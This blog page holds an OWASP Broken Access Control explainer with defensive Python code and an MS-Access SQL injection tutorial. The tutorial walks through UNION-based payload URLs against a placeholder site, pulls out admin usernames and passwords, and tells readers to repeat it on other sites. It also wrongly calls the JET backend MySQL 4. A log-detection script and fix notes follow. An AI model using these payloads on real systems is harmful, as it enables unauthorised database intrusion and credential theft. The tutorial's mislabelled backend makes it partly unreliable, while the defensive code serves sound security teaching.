Showing posts with label owasp top 10.

26 October, 2025

A01:2021 Broken Access Control: The Most Exploited Application Weakness

In the latest OWASP Top 10:2021 list, Broken Access Control has surged to the number one position—up from fifth place in the previous version. This marks it as the most exploited and widespread vulnerability in modern web applications. According to OWASP’s global testing data, 94% of applications were found to have at least one instance of broken access control, with over 318,000 occurrences mapped across 34 Common Weakness Enumerations (CWEs)—more than any other category.

What Is Broken Access Control?

Access control defines who can access what within a system. When these controls fail, attackers can gain unauthorized privileges, view sensitive data, or even perform administrative actions that compromise the entire application.
Simply put, broken access control is when an application fails to properly restrict actions that users are not allowed to perform.

Common Examples in Real-World Applications

  • Bypassing Role Restrictions: Changing a user role from “user” to “admin” through URL tampering or API manipulation.

  • Insecure Direct Object References (IDOR): Accessing someone else’s account or files by altering a parameter value such as a user ID.

  • CORS Misconfiguration: Allowing resources to be accessed from untrusted origins through weak cross-origin settings.

  • JWT or Session Token Tampering: Modifying tokens or cookies to escalate privileges.

  • Force Browsing: Manually visiting restricted paths such as /admin or /confidential/reports.

Even applications developed with strong authentication can fail if authorization checks are missing or inconsistently applied across modules.

Why It’s So Prevalent

Access control logic is often decentralized, implemented inconsistently by different developers, or handled on the client side where attackers can easily manipulate requests. Organizations underestimate how complex enforcing fine-grained permissions can be—especially in APIs and microservices.

How to Prevent Broken Access Control

  • Deny by Default: Restrict every action unless explicitly allowed by access control rules.

  • Centralize Enforcement: Implement a unified access control layer on the server side.

  • Enforce Resource Ownership: Validate that users only access data they own.

  • Secure Tokens: Use short-lived JWTs and revoke them following OAuth guidelines.

  • Test Rigorously: Include functional access control checks in automated unit and integration tests.

  • Monitor and Log: Detect repeated access control failures and alert administrators for investigation.

  • Limit CORS Exposure: Allow only trusted origins for cross-origin resource sharing.

Example in Action

Imagine a banking web app where user account information is fetched via a parameter:

https://examplebank.com/account?acct=12345

If a malicious user changes the account number to another user’s ID, and the app doesn’t verify ownership, the attacker gains access to the victim’s data. This is a textbook case of Broken Access Control through parameter tampering.
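To make the ownership check concrete, here is an added example (written for this page, not code from the original post) in Python. It places the vulnerable handler from the banking scenario beside a hardened version that applies the prevention list: one central, server-side authorization gate that denies by default, enforces resource ownership, and counts denied requests so that repeated failures can be flagged for investigation. The account store, the policy table, the roles (customer, support), the user names and the alert threshold are all constructed for the example.

```python
import logging
from collections import Counter
from dataclasses import dataclass
from urllib.parse import parse_qs, urlparse

log = logging.getLogger("authz")

# Constructed sample data standing in for the bank's account store: acct -> record.
ACCOUNTS = {
    "12345": {"owner": "alice", "balance": 2500},
    "67890": {"owner": "bob", "balance": 40},
}

# Deny-by-default policy: only (role, action) pairs listed here can ever be allowed.
# "admin" is deliberately absent, so even that role is denied until a rule is added.
POLICY = {
    ("customer", "account:read"),
    ("support", "account:read"),
}
# Hypothetical staff role allowed to read accounts it does not own (e.g. a support desk).
OWNERSHIP_EXEMPT = {"support"}

ALERT_THRESHOLD = 3            # denied requests per user before we flag them (assumed value)
failures: Counter = Counter()  # user_id -> number of denied requests


@dataclass(frozen=True)
class Principal:
    user_id: str
    role: str


class AccessDenied(Exception):
    pass


# --- Vulnerable handler: trusts the acct parameter as-is (IDOR) -----------------------
def get_account_vulnerable(url: str, user: Principal) -> dict:
    acct = parse_qs(urlparse(url).query)["acct"][0]
    # The caller is authenticated, but nothing checks that `user` owns `acct`.
    return ACCOUNTS[acct]


# --- Hardened handler: one central gate, deny by default, ownership enforced ----------
def deny(user: Principal, reason: str) -> None:
    """Single failure path: count and log the denial, then refuse the request."""
    failures[user.user_id] += 1
    log.warning("access denied user=%s role=%s reason=%s", user.user_id, user.role, reason)
    raise AccessDenied(reason)


def authorize(user: Principal, action: str, resource: dict) -> None:
    """Central authorization check; anything not explicitly allowed is denied."""
    if (user.role, action) not in POLICY:
        deny(user, f"role {user.role} has no rule for {action}")
    if user.role not in OWNERSHIP_EXEMPT and resource["owner"] != user.user_id:
        deny(user, f"{action} on a resource the caller does not own")


def get_account_hardened(url: str, user: Principal) -> dict:
    acct = parse_qs(urlparse(url).query).get("acct", [None])[0]
    resource = ACCOUNTS.get(acct)
    if resource is None:
        # Unknown account takes the same failure path, so a caller cannot tell
        # "does not exist" apart from "not yours".
        deny(user, "no such account")
    authorize(user, "account:read", resource)
    return resource


def attempt(url: str, user: Principal) -> str:
    """Outcome of a hardened read as a label ("allowed" / "denied")."""
    try:
        get_account_hardened(url, user)
        return "allowed"
    except AccessDenied:
        return "denied"


def users_to_investigate() -> list:
    """Monitor-and-log step: users whose denied requests reached the alert threshold."""
    return sorted(u for u, n in failures.items() if n >= ALERT_THRESHOLD)


if __name__ == "__main__":
    alice = Principal("alice", "customer")
    print(get_account_vulnerable("https://examplebank.com/account?acct=67890", alice))  # bob's data leaks
    print(attempt("https://examplebank.com/account?acct=67890", alice))                 # denied
    print(attempt("https://examplebank.com/account?acct=12345", alice))                 # allowed
    mallory = Principal("mallory", "customer")
    for acct in ("12345", "67890", "99999"):
        attempt(f"https://examplebank.com/account?acct={acct}", mallory)
    print(users_to_investigate())                                                       # ['mallory']
```

The point of routing every refusal through `deny` is that the ownership rule, the policy lookup and the "account not found" case all produce the same response and the same log line, which both avoids leaking which account numbers exist and gives the monitoring step a single counter to watch.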

Final Thoughts

Broken Access Control remains the most dangerous and commonly exploited vulnerability in 2021—and even in 2025, it continues to appear in bug bounties and penetration tests. It’s not just a coding mistake; it’s often a design-level flaw that gives attackers the keys to your system. By adopting a deny-by-default mindset and implementing robust, centralized authorization, developers can safeguard their applications from this critical threat.

09 October, 2022

MS-Access Injection - Tutorial - Penetration Testing | Bug Bounty Program

In this tutorial you will learn how to inject into an MS Access database.

We will start injecting manually. First we have to check whether our target site is vulnerable, so we will use the regular injection test and add a single quote ' at the end of the parameter, then execute the URL:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341'

Here we got the ERROR!

ERROR:

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'ID =341''.

/dettaglio-news.asp, line 91


So our target is vulnerable. Before starting the other steps we first have to balance our query. We will try different comment sequences to balance it.


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Error !

ERROR:Syntax error (missing operator) in query expression 'ID =341--'.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Again Error !!

Now let's check the null byte " ;% 00 "


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;% 00 Error Gone!!

So we will continue our injection using the null byte at the end of the parameter.

Now we have to count the total number of columns. For this we will use the usual ORDER BY command.

Let's check the total number of columns:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 1;% 00


No error, the page loaded normally.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 5;% 00

Again no error.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 8;% 00

Again the page loaded normally.

But at order by 9 we get the ERROR!

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 9;% 00



ERROR:

Microsoft JET Database Engine error '80040e14'

The Microsoft Jet database engine does not recognize '9' as a valid field name or expression.

/dettaglio-news.asp, line 91

So there are 8 columns.

Now let's prepare our UNION based command.

After executing the UNION based query we got an ERROR:


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;%

00



 

ERROR:

Microsoft JET Database Engine error '80004005'

Query input must contain at least one table or query.

/dettaglio-news.asp, line 91

Here comes the main part. As our column count is correct, it seems the database is MySQL 4.

Now we have to guess the tables and columns. First we will guess the tables.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from Login;% 00

It gives us an ERROR!

ERROR:

Microsoft JET Database Engine error '80040e37'

The Microsoft Jet database engine cannot find the input table or query 'login'. Make sure it exists and that its name is spelled correctly.

/dettaglio-news.asp, line 91

This means the table does not exist. Let's try another.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from tabladmin;% 00

Still the same ERROR!

But when we try the table ADMIN the error is gone.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from admin;% 00

At the table ADMIN the error is gone and we can see the vulnerable columns on the web page.

You can see that 2, 3 and 6 are the vulnerable columns, so now we have to guess the column names. We will put our column names into these vulnerable columns.


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,admin_id,4,5,6,7,8 from admin;% 00

It gives us an error!

ERROR:

Microsoft JET Database Engine error '80040e10'

No value given for one or more required parameters.

/dettaglio-news.asp, line 91

This means the column does not exist. Let's try another.


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,login_id,4,5,6,7,8 from admin;% 00

Still the same error!

When we put in the username column the error is gone.


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,username,4,5,6,7,8 from admin;% 00



So it gives us Username: 01775IO5

Now let's guess the column for the admin password. The column password also exists there.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,password,4,5,6,7,8 from admin;% 00



It gives us Password="bEx0Th6

So we will do the same for other sites to inject into their databases.
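The same sequence seen from the defender's side: the probing walked through above leaves a recognisable trail in the web server log, with a stray single quote, comment sequences, a null byte, ORDER BY and UNION SELECT in the query string, interleaved with 500 responses from the JET errors. The following is an added example written for this page, not part of the tutorial, in Python. It parses constructed IIS-style W3C log lines (the reduced #Fields set, the timestamps and the client addresses from the documentation ranges are all made up), URL-decodes each query string, flags those indicators per request, and reports clients whose activity crosses a threshold while letting a lone apostrophe in a name pass. The application-side root cause is that the ID parameter is concatenated into the SQL text; the fix is to pass it as a typed query parameter (an ADODB.Command parameter in classic ASP), so that none of these characters can change the query's structure.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed IIS-style W3C log excerpt (reduced field set). The requests replay the probing
# sequence from the tutorial; the addresses are from the documentation ranges, not real hosts.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2022-10-09 10:01:02 GET /dettaglio-news.asp ID=341 203.0.113.7 200
2022-10-09 10:01:05 GET /dettaglio-news.asp ID=341' 203.0.113.7 500
2022-10-09 10:01:09 GET /dettaglio-news.asp ID=341--+ 203.0.113.7 500
2022-10-09 10:01:14 GET /dettaglio-news.asp ID=341;%00 203.0.113.7 200
2022-10-09 10:01:20 GET /dettaglio-news.asp ID=341+order+by+9;%00 203.0.113.7 500
2022-10-09 10:01:31 GET /dettaglio-news.asp ID=341+Union+Select+1,2,3,4,5,6,7,8+from+admin;%00 203.0.113.7 200
2022-10-09 10:02:00 GET /dettaglio-news.asp ID=342 198.51.100.4 200
2022-10-09 10:02:03 GET /search.asp q=O'Brien 198.51.100.4 200
"""

# Each indicator is a predicate over the decoded query string.
SQL_KEYWORDS = re.compile(r"\b(union\s+(all\s+)?select|order\s+by|select\b.+\bfrom)\b", re.I)
INDICATORS = {
    "unbalanced_quote": lambda q: q.count("'") % 2 == 1,
    "sql_comment": lambda q: "--" in q or "/*" in q,
    "null_byte": lambda q: "\x00" in q,
    "sql_keyword": lambda q: SQL_KEYWORDS.search(q) is not None,
}


def parse_w3c(text: str):
    """Yield one dict per request line, using the #Fields header for column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()  # W3C values are space-delimited; spaces inside values are encoded
        if fields is None or len(values) != len(fields):
            continue  # cannot map this line onto a known layout; skip rather than guess
        yield dict(zip(fields, values))


def score_request(rec: dict) -> list:
    """Names of the indicators that fire on one request's decoded query string."""
    raw = rec.get("cs-uri-query", "-")
    query = "" if raw == "-" else unquote_plus(raw)
    return [name for name, test in INDICATORS.items() if test(query)]


def find_probing_clients(text: str, min_hits: int = 3) -> dict:
    """Per-client summary of clients that look like they are probing for SQL injection.

    A client is reported when it sends at least `min_hits` suspicious requests, or any
    request carrying a SQL keyword. A lone apostrophe (a name like O'Brien) is not enough.
    """
    per_client = defaultdict(lambda: {"suspicious": 0, "errors": 0, "indicators": set()})
    for rec in parse_w3c(text):
        hits = score_request(rec)
        if not hits:
            continue
        c = per_client[rec["c-ip"]]
        c["suspicious"] += 1
        c["indicators"].update(hits)
        if rec["sc-status"].startswith("5"):
            c["errors"] += 1  # server errors right after the probes: the error-based technique at work
    return {
        ip: {"suspicious": c["suspicious"], "errors": c["errors"], "indicators": sorted(c["indicators"])}
        for ip, c in per_client.items()
        if c["suspicious"] >= min_hits or "sql_keyword" in c["indicators"]
    }


if __name__ == "__main__":
    for ip, summary in find_probing_clients(SAMPLE_LOG).items():
        print(ip, summary)
```

Decoding before matching matters: the null byte arrives as `%00` and the spaces as `+`, so a rule applied to the raw `cs-uri-query` field would miss the ORDER BY and UNION SELECT probes entirely. Correlating the indicators with the 5xx responses is what separates an error-based injection attempt from a user who happens to type an apostrophe.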
